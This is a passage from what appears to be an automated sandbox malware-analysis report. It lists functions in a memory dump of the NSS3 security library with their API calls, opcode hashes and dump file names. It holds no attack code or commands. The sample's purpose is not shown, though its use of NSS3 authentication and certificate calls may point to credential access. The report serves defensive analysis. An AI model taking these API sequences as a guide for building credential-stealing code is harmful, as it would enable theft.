                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 132756963-0
                                                                                                                                                                                                                          • Opcode ID: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
                                                                                                                                                                                                                          • Instruction ID: 216b9bdbf2bd8b829428258310e61daee8ca15baa1920273d374bd8b2e8f88e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E521C3B1D002248BEB20DF64D805DEEBBB4EF05209F064168D8057B711FB31AA49CBE5
                                                                                                                                                                                                                          Function 6C4C3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C3C9E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C3CAE
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C3CEA
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3D02
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                          • Opcode ID: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
                                                                                                                                                                                                                          • Instruction ID: 713f123f296bef2ac9a171d58b6da8e77c609a7faadb66fff2e3bf512eb84974
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1119D7AA00214AFEB00EF24DC48E9A3778EF09369F554164EC088B722E731ED448AE1
                                                                                                                                                                                                                          Function 6C4CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C4CF0AD,6C4CF150,?,6C4CF150,?,?,?), ref: 6C4CECBA
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C4CECD1
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C4CED02
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C4CED5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                          • Instruction ID: ba24e346a56770f5158f28d17e0e854b17caa69535ec9ecc7cfb7bf940d60bd1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C72101B5A017829BE300CF21D984F52B7E4BFA4309F26C21AE80C87B61EB70E594C6D1
                                                                                                                                                                                                                          Function 6C49C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?), ref: 6C49C890
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C49C8B2
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C49C8D0
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49C8EB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 999015661-0
                                                                                                                                                                                                                          • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                          • Instruction ID: 6901fecdbc2a90a81d6296ed7e4307ec161ff570f75dcd4b778f876e9e063529
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D01C666E111306BD700E5B96C80EAF3F699B4526EF040139FC08A6B01F751881982E2
                                                                                                                                                                                                                          Function 6C4FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDD4
                                                                                                                                                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDFD
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE14
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C4E9767,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE33
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3903481028-0
                                                                                                                                                                                                                          • Opcode ID: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                          • Instruction ID: d9da81c9dd2e83b0aee59866507e02eea407bfdb42520088129742e7d2e64fef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF11A3B1A04706ABEB10DE65ECC4F46B3A8EB8035EF204535E92987F01E331F46687E1
                                                                                                                                                                                                                          Function 6C47DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C47DFBF
                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C47DFDB
                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DFFA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47E029
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3183882470-0
                                                                                                                                                                                                                          • Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                          • Instruction ID: 319c20012f514cd7c23b4c5897563a13c38005994edc70fcdf8442d868a3d9cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D110C71A04265AFDB30DEB95C88FEF7678AB8035DF040638E91887B01E736D81596F1
                                                                                                                                                                                                                          Function 6C498DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                          • Opcode ID: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                          • Instruction ID: 309150fa1b146b8eeaf236e39f514e33369126adde77b58c847618ee8ad5478e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9114F75A05A109BDB00AF78D848A6ABBF4FF45714F024969DC88DBB00E730E894CBD5
                                                                                                                                                                                                                          Function 6C51AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51AC94
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACA6
                                                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACC0
                                                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACDB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3989322779-0
                                                                                                                                                                                                                          • Opcode ID: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                          • Instruction ID: 37b0786d2b99cb777a9f7974d010ef11f5e1495eacdcdca06f6d4a54b81b65c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 350129B1601B029BEB51DF2ADD08A57B7E8BF10699B104839E85AD7E00E731F159CBD1
                                                                                                                                                                                                                          Function 6C481DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C481DFB
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C481E09
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(?,?,6C47E175), ref: 6C47E19C
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(6C47E175), ref: 6C47E1AA
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E208
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PL_HashTableRemove.NSS3(?), ref: 6C47E219
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E231
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E249
                                                                                                                                                                                                                            • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E257
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481E37
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C481E4A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 499896158-0
                                                                                                                                                                                                                          • Opcode ID: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                          • Instruction ID: a7a339a4fe273742be84fc699e15f25661cc4023b086f69c5b76d7eba986049f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D01D471B01250D7EB10CA29EC40FA67764AB8174DF110137E93997B51E731E814CBE5
                                                                                                                                                                                                                          Function 6C481D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481D75
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C481D89
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C481D9C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C481DB8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 939066016-0
                                                                                                                                                                                                                          • Opcode ID: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                          • Instruction ID: d96e6a444756003a2ceeb5a335778b600e4efa1f962c050b786dbbdd3f522cc3
